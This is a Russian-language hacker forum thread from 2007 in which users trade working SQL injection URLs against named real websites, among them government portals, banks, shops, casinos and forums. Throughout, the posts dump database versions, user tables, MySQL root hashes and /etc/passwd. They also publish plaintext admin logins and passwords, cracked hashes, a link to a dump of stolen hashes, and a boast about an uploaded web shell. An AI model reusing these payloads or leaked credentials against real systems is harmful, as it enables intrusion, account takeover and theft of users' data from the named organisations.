Просмотр полной версии : SQL Инъекции
делать было нечего :\
_://www.vlad.myths.ru/songs.php?song=-1903%20union%20select%201,2,3,concat(name,char(10) ,password),5,6,7,8,9,0,1,2,3%20from%20users/*
<title>...</title>
big_BRAT
09.10.2007, 10:05
Для некоторых будет интересная база))))
Компания одна из групнейших поставщиков ПК техники на Украине
База одна для всех сайтов:
http://www._gb_.ua/
http://www._compass_.com.ua/
http://www._hi-fi_.com.ua/
http://www._delfics_.com/
скл есть почти на всех перечисленных сайтах
http://www._delfics_.com/Del_buy.asp?City_id=1+or+1=(SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES)--
интересные таблицы
ShopOrders
ManagerShopPollOtherSources
Articles
Cards
CardsToCustomers
ForumForums
ManagerShopLogins
MHShops
RacingBingo
RacingCards
ShopCustomers
http://www._delfics_.com/Del_buy.asp?City_id=1+or+1=(SELECT+TOP+1+column_NA ME+ FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_NAME= 'ShopCustomers'+an+column_name+not+in+('Customer_I d','Login','Password','First_Name' ,'Last_Name','Middle_Name','Email','Phone','Fax',' Region_id','City_id','Address','Zip','CustomerStat us_Id', 'Company_name','Company_address','Company_zkpo','C ompany_inn','Company_svid','Company_nds','Subscrib e1','Subscribe2','ForumDisplayEmail','Add_Date','M odification_Date','Site'))--
http://www._gb_.ua/shop/manager.asp?id=9991+uNioN+SeleCt+Card_Id,Balance,A ctivationCode,IsActivated+from+Cards--
http://www._gb_.ua/shop/manager.asp?id=9991+uNioN+SeleCt+id,login,password ,ShopName+from+ManagerShopLogins+where+id+not+in(' 1')--
пароли как то форума так и от входа не шифрованы
big_BRAT
09.10.2007, 14:24
Народ, хелп, у когонить случайно незавалялся скрипт или доступ к хакнутому "агенству недвижимости"?
П.С очень нужно, ща вот сам через гуглю ищу дырявые "агенства недвижимости", если найду - выложу)
(Если кто жадный - могу поменять на скрипт инет магазина который я делал сам вручную снуля, вот пример: http://else.com.ua)
-----------------------------------------------------------------------
Вот нашол и залил шелл: http://www.multydom.crimea.ua/error.php
но эт некатит, ибо сделано кривыми руками и больше 20 баксов мне за него недадут...
-----------------------------------------------------------------------
Если кому несложно, выручите меня, буду всегда рад помоч...
P.S нужно чото типа этого агенства недвижимости: http://www.arcoreal.com.ua
(чтоб был поиск по хатам)
вообщето это не в эту тему......
http://www.arcoreal.com.ua/private/sql/
по этому адрессу лежит файт dump.sql
там два хеша. попробуй расшифровать.
админка тут http://www.arcoreal.com.ua/admin
Классный вывод)
http://www.bog.gov.gh/displayimage.php?displaytype=Thumbnails&albumid=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,convert(table_name%20using%20ut f8),9,0,1,2,3%20from+information_schema.tables/*&SOffset=0
А вот, собственно
http://www.bog.gov.gh/displayimage.php?displaytype=Thumbnails&albumid=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,convert(concat(AdminName,0x3a,P assKey)%20using%20utf8),9,0,1,2,3+from+bog_tbladmi nistrator/*&SOffset=0
Ну и еще
user - rad@localhost
version - 4.1.11
http://www.rad.gov.tw/prg/e_disscuss_content.php?id=-21663%20union%20select%201,2,convert(concat(databa se(),0x3a,user())%20using%20latin1),4,convert(vers ion()%20using%20latin1),6,7,8,9,10,11/*
corporin_impacto@localhost
4.1.22-standard
http://www.corporinoquia.gov.co/2170/preguntas2.php?proceso=-9%20union%20select%201,user(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*
4.1.8-nt
http://www.ttjfng.gov.tw/info_detial.php?InfoID=-88%20union%20select%201,2,3,4,5,version()/*
http://www.humor.fo/link/pass2.php?id=-1'/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database( )),5,6,7,8,9,10,11,12,13/*runilo_mamb1@localhost:4.1.22-standard:runilo_mamb1
http://www.humor.fo/link/pass2.php?id=-1'/**/union/**/select/**/1,2,3,concat(memberName,0x3a,passwd,0x3a,passwordS alt,0x3a,emailAddress,0x3a,ICQ,0x3a,websiteUrl,0x3 a,secretQuestion,0x3a,secretAnswer,0x3a,hideEmail, 0x3a,location,0x3a,posts),5,6,7, 8,9,10,11,12,13/**/from/**/smf_members/*http://www.humor.co.il/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a, ver sion(),0x3a,database()),10,11,12,13,14,15/*anakonda_HumorGo@localhost:4.1.22-standard:anakonda_humor2http://www.humor.co.il/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(username,0x3 a,password,0x3a, email),10,11,12,13,14,15+from+users/*http://www.flighthumor.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a, version(),0 x3a,database()),10,11,12,13,14,15/*fh_fh@localhost:4.0.27-standard-log:fh_flighthumor
*www.gateway.uz
TABLE_NAME : COLUMN_NAME
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat(table_name,0x3a,c olumn_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26+from+information_schema.colum ns/*
_________________
SHCEMA.TABLES:SITE_USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.tables+where+table_name=char (0x73,0x69,0x74,0x65,0x5f,0x75,0x73,0x65,0x72,0x73 )/*
_________________
SHCEMA.TABLES:ICM_USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.columns+where+table_name=cha r(0x69,0x63,0x6d,0x5f,0x75,0x73,0x65,0x72,0x73)/*
_________________
SHCEMA.TABLES:TRUSTED_USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.columns+where+table_name=cha r(0x74,0x72,0x75,0x73,0x74,0x65,0x64,0x5f,0x75,0x7 3,0x65,0x72,0x73)/*
_________________
SHCEMA.TABLES:USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.columns+where+table_name=cha r(0x75,0x73,0x65,0x72,0x73)/*
_________________
вывод:igca.site_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,Name,P os,Org,NickName,Password),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+igca.site_ users/*
вывод:cen.site_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,Name,P os,Org,NickName,Password),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+cen.site_u sers/*
вывод:cagateway.site_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,Name,P os,Org,NickName,Password),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+cagateway. site_users/*
вывод:igca.trusted_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,Id,Login, Password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26+from+igca.trusted_users/*
вывод:rstate.users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,userty pe,username,pass),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26+from+rstate.users/*
http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,concat(user(),0x3a,version(),0x3a,database()),3/*
Y.Dmitriy
09.10.2007, 15:52
http://geolog.mnr.gov.ru/part/?pid=-1+union+select+1,LOAD_FILE('/etc/passwd'),3/*
Так намного красивей)
http://www.grbipunjab.gov.pk/menu_contents.php?MAINID=11&SUBID=-9%20union%20select%201,version(),3,user()/*
4.1.7
http://www.nlm.gov.mv/main/latestbookdetails.php?bookdetails=-7%20union%20select%201,2,convert(database()%20usin g%20latin1),4,5,6,7,8,convert%20(version()%20using %20latin1),0/*
4.0.13-nt - 6
http://menweb.mineducacion.gov.co:8080/saber/casos_i.php?Institucion1=-9%20union%20select%201,2,3,4,version(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20/*
4.0.17-log
http://www.semar.pi.gov.br/noticias.php?codigo=-582+union+select%201,2,3,4,VERSION(),6,7,8,9,0/*
4.1.22-standard
http://www.ecs.gov.bd/electoral.php3?t=-5+union+select+1,version(),3/*?ifs=-9
4.0.26-nt-log
http://www.camarapalmares.pe.gov.br/requerimentos.php?r=-8%20union%20select%201,2,3,4,version(),6,7/*
4.1.12-standard-log
http://www.bombeiros.mt.gov.br/site/conteudoUnidade.php?unidade=0&id=-7%20union%20select%201,2,convert(version()%20using %20latin1),4,5,6,7/*&PHPSESSID=b5d7181c5cb7ba97ed178c7b4ccd94f9
4.0.27-standard-log
http://www.zt-rada.gov.ua/ukrainian/turbotapage.php?page_id=7&turb_pidrozdil_id=-9%20union%20select%201,version(),3/*
В продолжение
http://www.zt-rada.gov.ua/ukrainian/turbotapage.php?page_id=7&turb_pidrozdil_id=-9%20union%20select%201,concat(user_name,0x3a,user_ password),3%20from%20users/*
для "любителей" Дома-2:
http://romaolya.ru/videogal/?cat=-4+UNION+SELECT+1,2,user(),4,5,6/*
FFFFx029A
10.10.2007, 11:17
Народ, хелп, помогите заюзать сайтец, очень нужно узнать или доступ к админке или шелл залить..., основная цель - эт выкачать скрипты.
(Сайт дырявый как сито)
P.S ща вот сам колупаю, еси у кого получиться скидуйте сюда...
http://www.megaholl.com.ua/find_flat.php?a=1&d%5B%5D=16&d%5B%5D=21&d%5B%5D=22&d%5B%5D=23&d%5B%5D=26&d%5B%5D=39))+union+select+user(),user(),3,4,5,6,us er(),user(),user(),user(),user(),user(),13,14,15,1 6,17,18,19,20,21,22,23/*&sm=s1a&sr=n
или вот:
http://www.megaholl.com.ua/find_stead.php?a=2'
----------------------------------------------------------------------------
Вот версия мускула: http://www.megaholl.com.ua/4.1.22-standard/2.html
Вот так узнал версию:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+version(),2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Вот пользователь: http://www.megaholl.com.ua/u_megaholl@localhost/2.html
Во так узнал пользователя:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+user(),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Вот БД:
http://www.megaholl.com.ua/megaholl/2.html
Вот так узнал имя ДБ:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*&sm=s1d&sr=t
Названия таблиц - немогу узнать, т.к пишет ошибка, но явная ошибка невысвечуеться (скрыто тут такое)
Вот для наглядности чтобы вы неискали где выводяться данные, я кстате случайно заметил, думал что там фильтруеться, ггг
Вот: http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),'wwwww wwwwwwwwwwwwwwww',3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
0nep@t0p
10.10.2007, 12:12
http://www.eskmo.ru/
Книжное издательство "Эксмо"
http://www1.eksmo.ru/catalog/book?b=-83262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,VERSION(),22,23,24,25/*
FFFFx029A
10.10.2007, 14:01
Заюзать реально? (MSSQL)
http://www.reonline.ru/offers/556623.cnt?page=2&o_object=3'&o_type=1
Ну вобщем ничего сложного нет, поэтому выкладываю сюда, а там на рассмотрение модеров...
вобщем нашел скулю:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(user,':',password ),4,5,6,7+from+mysql.user/*
я думаю все знают, что это такое, но воспользоваться этим не получится, так как на серваке открыт только 80 порт (HTTP)
увидел, что на серве есть форум (он относится, к всему мегафону поволжья), форум самописный, так, что пришлось воспользоваться интуицией и она меня не подвела:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,3,4,5,6,7+from+forumuser s/*
дальше пришлось подбирать поля, почти во всех подобных таблицах есть поле id, остается только найти префикс (ну или типа этого). Опять же интуиция вкупе с логикой не подвели:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,fu_id,4,5,6,7+from+forum users/*
дальше подбирать поля - дело техники и вот конечный результат:
http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(fu_name,':',fu_pw d),4,5,6,7+from+forumusers+where+fu_id=1/*
как видим пароль в чистом виде, логинимся на форуме и становимся админами... для того, что б войти в панель админа надо нажать на ссылку "аватары" вверху появится окно бейсик авторизации, в него вводим эти же логин/пасс и админим форум... все...
ЗЫ еще нашел там таблички:news
dealers
phones
PPS логин/пароль форума подходит к магазину
http://www.butterslice.com/browsecats.php?cid=51%20union%20select%201,concat( sb_pwd,char(58),sb_pwd),3,4%20from%20sbjbs_admin/*
pcquestnb:Pcquestnb
http://www.ro-jobs.ro/browsecats.php?cid=48%20union%20select%201,concat( sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_ admin/*
admin:q7w7e7r7
http://ph.jobcentralasia.com/browsecats.php?cid=46%20union%20select%201,concat( sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_ admin/*
admin:qwertyuiop
http://www.buljob.com/search_result.php?cid=970000%20union%20select%201, concat(sb_admin_name,char(58),sb_pwd),3,4%20from%2 0sbjbs_admin/*
admin:I4ipBuOFUSuVaak2Y66*
http://www.host.uzip.uz/search_result.php?cid=-10+union+select+1,VERSION(),3,4/*
http://www.all-horse-classifieds.com/browsecats.php?cid=-26+union+select+1,VERSION(),3,4,5/*
офсайт города Бельцы :)
код:
http://www.beltsy.md/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=-1+union+select+1,2,load_file(0x2f6574632f706173737 764),4,5,6,7,8,9,10,11,12+from+sedoi_users/*
__________________________________________________ __________
www.seejob.md
код:
http://www.seejob.md/?page=view&t=0&id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(table_name,0x3a,column_name),15,16,17,18,19,20, 21,22,23,24,25,26+from+information_schema.columns+ limit+1374,1/*
Underwit
11.10.2007, 01:40
http://www.bmoca.org/artist.php?id=-1+union+select+1,2,3,4,CONCAT(username,0x3a,passwo rd),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25+from+users/*
http://www.bmoca.org/admin/
usename:bmoca
password:bm0c@
http://www.ur0mc.com/ru/photo.php?id=-1+union+select+1,version()/*
http://www.dandbpoker.com/book_detail.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,data base()),5,6,7,8,9,10,11,12,13,14/*harakis@server213-171-218-201.livedns.org.uk:4.1.22-standard-log:harakis
http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3 a,database()),4,5,6/*&parent=mediamarket@localhost:5.0.33:mmg_hpoker
http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,password),4,5 ,6+from+mys ql.user+limit+0,1/*&parent=root:*E459468099CBA6AEE7E679233A154F2DA83C2 3F8
banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B 6E8307E1
mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B6 6CF7
http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,versio n(),0x3a,database()),4, 5,6/*& parent=mediamarket@localhost:5.0.33:mmg_pokertut
http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,pa ssword),4,5,6 +from+mysql.us er/* &parent=root:*E459468099CBA6AEE7E679233A154F2DA83C2 3F8
banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B 6E8307E1
mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B6 6CF7
http://www.casino-fr-bonus.com/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,vers ion(),0x3a,database()),6,7,8,9,10,11/*user9718a@192.168.1.155:5.0.22-Debian_2-log:user9718a1
h*tp://www.grandscasinos.com /it/id.php?ID=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11/*
h*tp://www.casino-online-fr.com /ru/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6,7,8,9,10,11
h*tp://www.7casinoonline.com /it/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6,7,8,9,10,11
h*tp://www.equipodepoker.com /index.php ' or 1=1/*
h*tp://www.rakemeback.com /my-account/ ' or 1=1/*
http://acc.com/php/cms/index.php?id=1/**/union/**/select/**/null,null,null,null/**/from/**/user--
DOS CREDO BANK
код:
http://www.credo.com.kg/news/?id=-8+union+select+1,cast(concat_ws(0x3a,version(),use r(),database())+as+binary)/*
! HELP !
5 мускул, но вывода колонок и таблиц через information_schema так и не смог! Что тут за заморочка?
http://www.ubisoft.ru/games/game.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11+from+news/*
starz.ru
http://starz.ru/photo/?celeb=-64+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3/*
uralmoto.ru логин/хеш/уин
http://uralmoto.ru/stories.php?sid=-1'+union+select+1,2,3,4,5,concat(username,0x3a,use r_password,0x3a,user_icq),7,8,9,10,11,12+from+phpb b_users+limit+1,1/*
надеюсь не бояны ))
http://sc-ufa.uraltb.ru/?id=99999+union+select+1,2,3/*
_http://www.lanchesterbrassband.org.uk/news.php?id=7+union+select+1,concat_ws(0x3a,name,p assword),3,4,5,6+from+users+limit+1,3
хеши:
member:4e4d6c332b6fe62a63afe56171fd3725 расшифровал:haha
ian:919b720497e91197077a706775c5a9ad
adam:2e456fdbaadea50686a5809d9c540243
http://www.lanchesterbrassband.org.uk/login.php member:haha
Заказываем девочек :) ...
код:
http://elit.tv/index.phtml?id=-42+union+select+1,concat_ws(0x3a,id,name,passwd),3 ,4,5,6,7,8,9,10,11+from+admin_users/*
...но для начала нужно найти админку ;)
0nep@t0p
12.10.2007, 10:33
ЗАО "МОССТРОЙЭКОНОМБАНК"
http://www.mseb.ru/news/?act=show_news&id=-62+union+select+1,2,table_na me,4,5,6,7,8,9+from+information_schema.tables+limi t+1 ,99/*
Версия: 5.0.41-log
http://www.mseb.ru/news/?act=show_news&id=-62+union+select+1,2,con cat(user,0x3A, pass),4,5,6,7,8,9+from+auth_user/*
usoftadmin:f02539ca4eff95f24c00d82eb62e275e:xtrfen
mseb:6d390ae485e95ceac9ce280f02d0c409
Жаль обминку найти не смог (
Red_Red1
12.10.2007, 10:47
2 0nep@t0p
http://www.mseb.ru/adm/login.php?ref=%2Fadm%2Findex.php вот админка
http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),i cq_number,concat(ip_address,0x3a,email),7,8+from+v itz_forums.ibf_members/*
Сразу вся база имя\хеш\уин\IP\email 5931 записей ) жаль что IPB (
http://www.barrowfc.com/index.php?inc=player&id=-5+union+select+1,2,3,4,concat_ws(0x3C62723E,VERSIO N(),DATABASE(),USER()),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24
4.1.21-standard
barrowfc_results
barrowfc_barrowf@localhost
http://www.enlajugada.com/principal/ver_nota.php?idn=-10+union+select+1,2,concat_ws(0x3C62723E,VERSION() ,DATABASE(),USER()),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f706173737 764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f686f73747 3),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f7379736c6 f672e636f6e66),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f736572766 9636573),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f67726f757 0),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f6e6574776 f726b73),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49/*
http://www.enlajugada.com/principal/ver_nota.php?idn=-1+union+select+1,2,load_file(0x2f6574632f70726f666 96c65),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,48,49/*
4.0.24
enlajugada
enlajugada@localhost
http://f1latam.com/noticias.php?idn=-3452+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C 62723E,VERSION(),DATABASE(),USER()),11,12
4.1.22-standard
henrybcu_dbflatam
henrybcu_f1lat07@localhost
http://www.considi.it/news.php?idn=-8+union+select+1,2,concat_ws(0x3C62723E,VERSION(), DATABASE(),USER()),4,5,6,7,8,9,10,11/*
5.0.45-community-log
Sql154922_1
Sql154922@62.149.140.47
www.autozel.ru
http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,4,5,6,7,8,concat(version() ,0x3a,database(),0x3a,user()),10,11,12,13/*
4.1.11:autozel1_aaaa:website@localhost
http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,concat(username,0x3a,user_ password,0x3a,user_icq),5,6,7,8,9,10,11,12,13+from +phpbb_users+limit+1,1/*
имя \ хеш \ уин
0nep@t0p
12.10.2007, 18:38
Национальный Банк Развития
http://www.nbd.ru/ns/about/news/?id=-53+union+sele ct+1,2,LOAD_FILE('/etc/passwd'),4,5,6, 7,8,9,10,11,12,13/*
Также используя LOAD_FILE: /etc/networks, /etc/group, /etc/services, /etc/hosts, /etc/profile
Version: 4.0.10-gamma
User: root@localhost
;)
код:
http://www.zonanu.nu/anketa.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,concat_ws(0x3a,login,pass),34,35+from+u57027_2.o snova/*
+
http://www.paradiz.nu/news.php?id=-9+union+select+1,concat(login,0x3a,password),3,4+f rom+u57027_3.fs_admin/*
всего их четыре сайта,но на всех одна и та-же бд
___________________________________________
код:
http://otdohni.nu/full_view.php?id=-130+union+select+1,concat(table_name,0x3a,column_n ame),3,4+from+information_schema.columns/*
код:
http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass),3 ,4+from+admins/*
код:
http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,ma il,tel),3,4+from+clients/*
код:
http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,ma il,tel),3,4+from+users/*
админка
http://otdohni.nu/admin
login/pass:
xs7df9023fgh55:dsfgy877gfh7gv5h8m76gh
:D
http://www.obdesigualtats.org/obd/lstcontenido.php?IDC=&IDA=-1+union+select+1,2,concat_ws(0x3C62723E,0x3C62723E ,VERSION(),DATABASE(),USER(),0x3C62723E),4/*
4.0.24_Debian-10sarge2-log
obdesigualtats
obdesigualtats@pau.pangea.org
http://www.phpvillage.org/member.php?idu=-1+union+select+concat_ws(0x3C62723E,VERSION(),DATA BASE(),USER()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
4.1.22-standard
phpvilla_php
phpvilla_root@localhost
http://www.simplog.org/archive.php?blogid=1&pid=-56+union+select+1,2,3,4,concat_ws(0x3C62723E,VERSI ON(),DATABASE(),USER()),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f70617 3737764),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f73686 1646f77),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f686f7 37473),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f73797 36c6f672e636f6e66),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f73657 27669636573),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f67726 f7570),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f70726 f66696c65),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f62617 3687263),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f736b6 56c2f2e626173687263),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f70687 02e696e69),6,7,8
http://www.simplog.org/archive.php?blogid=1&pid=-1+union+select+1,2,3,4,load_file(0x2f6574632f68747 470642f636f6e662f68747470642e636f6e66),6,7,8
4.1.20
blog
root@localhost
Пипец. nasa-academy.org <- 86 столбцов.
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3C62723E,VERSION(),DATABASE(),USER(),0x3C62723E) ,30,
31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,
61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86
http://www.nasa-academy.org/db/alumni.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,table_name ,30,
0x3C62723E,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,
61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86+from+information_schem a.tables+limit+16,1
5.0.26-max-log
academy
academy@localhost
Блин, чё, наса не могут нанять нормальных спецов, чтобы сделали сайт без багов?
delay(0)
12.10.2007, 23:08
http://omsk.arsec.ru/modules/articles/article.php?id=1+union+select+1,2,3,4,5,6,concat(u name,0x3a,pass),8,9,1,2,3,4,5,6,7,8,9,1,2+from+u26 773.ars_users+limit+1,1/*
admin:48c7b8a13ce1f0fbbec213d87ebcda5e
http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),i cq_number,concat(ip_address,0x3a,email),7,8+from+v itz_forums.ibf_members/*
Сразу вся база имя\хеш\уин\IP\email 5931 записей ) жаль что IPB (
Расшифровал. :) (Пользователей:4996, Найдено:3220)
http://rapidshare.com/files/62099632/hashes.rar.html
http://www.0629.com.ua/view_news.php?id_news=
Только не пойму чего с ней делать!
http://www.house-ua.com/item.php?skin=kv_pr&id=-23468'+union+select+user(),version(),database()/*
sulaspaka
13.10.2007, 09:44
помогите pаскрутит
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,4,5/*
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(user(),0x3a,ver sion(),0x3a,database()),5/*admin@localhost:5.0.27-log:runescape
выводим количество таблицhttp://tip.it/runescape/?times='+UNION+SELECT+1,2,3,count(table_name),5+fr om+information_schema.tables/*142, =///
